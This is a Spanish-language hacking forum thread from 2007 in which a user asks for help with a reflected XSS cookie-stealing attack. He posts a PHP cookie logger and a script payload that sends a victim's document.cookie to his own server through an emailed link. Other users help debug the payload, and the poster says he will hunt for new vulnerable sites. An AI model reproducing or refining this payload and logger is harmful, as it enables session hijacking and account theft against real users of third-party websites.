elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda con XSS		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con XSS  (Leído 7,116 veces)
magarcan

Desconectado Desconectado

Mensajes: 80


Ver Perfil
Ayuda con XSS
« en: 28 Noviembre 2007, 12:56 pm »
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
Código:
 <?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>

Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
En línea
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Ayuda con XSS
« Respuesta #1 en: 28 Noviembre 2007, 14:32 pm »
y estas seguro que esa persona esta logueada?

pork de no ser asi recibiras el archivo en blanco..


y creo que en el txt te falta el $_GET para capturar la Cookie desde el link

con el metodo get

=D

Suerte ;D
En línea
Experimental Serial Lain [Linux User]
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #2 en: 28 Noviembre 2007, 14:34 pm »
Cita de: magarcan en 28 Noviembre 2007, 12:56 pm
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
Código:
 <?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>

Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>

Dale
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
En línea
magarcan

Desconectado Desconectado

Mensajes: 80


Ver Perfil
Re: Ayuda con XSS
« Respuesta #3 en: 28 Noviembre 2007, 14:54 pm »
Gracias por las respuestas.
Cita de: EvilGoblin
y estas seguro que esa persona esta logueada?
Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas.

Cita de: EvilGoblin
y creo que en el txt te falta el $_GET para capturar la Cookie desde el link
¿En que parte del código?

Cita de: Ing_Amc
Dale
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido?
En línea
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Ayuda con XSS
« Respuesta #4 en: 28 Noviembre 2007, 15:11 pm »
te dice que le agreges una cadena, para comprobar verdaderamente si guarda el texto ;P

si te guarda solo "blablabla"

es que no habia cookie para guardar ^^
En línea
Experimental Serial Lain [Linux User]
magarcan

Desconectado Desconectado

Mensajes: 80


Ver Perfil
Re: Ayuda con XSS
« Respuesta #5 en: 28 Noviembre 2007, 15:26 pm »
Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas.  :-\
A ver si tengo suerte.
En línea
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Ayuda con XSS
« Respuesta #6 en: 28 Noviembre 2007, 19:29 pm »
Creo que no es nada dificil comprobar si el error de XSS sigue funcionado :P

se supone q vos lo encontraste.....

y no sabes como capturar la cookie?

 xDD no entiendo aun como pudiste encontrarlo.. y menos aun como no sabes comprobar si funciona o no... y capturar la cookie -.-

aniway! ^^=D

MUCHA SUERTE (Y)
En línea
Experimental Serial Lain [Linux User]
magarcan

Desconectado Desconectado

Mensajes: 80


Ver Perfil
Re: Ayuda con XSS
« Respuesta #7 en: 28 Noviembre 2007, 19:39 pm »
Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.

PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.

---GRACIAS---
En línea
zhynar_X


Desconectado Desconectado

Mensajes: 515


Use linux my friend...


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #8 en: 28 Noviembre 2007, 21:57 pm »
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos
En línea
Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: Ayuda con XSS
« Respuesta #9 en: 29 Noviembre 2007, 03:50 am »
Cita de: zhynar_X en 28 Noviembre 2007, 21:57 pm
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos

Muy buen documento me lo lei completito  ;D
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines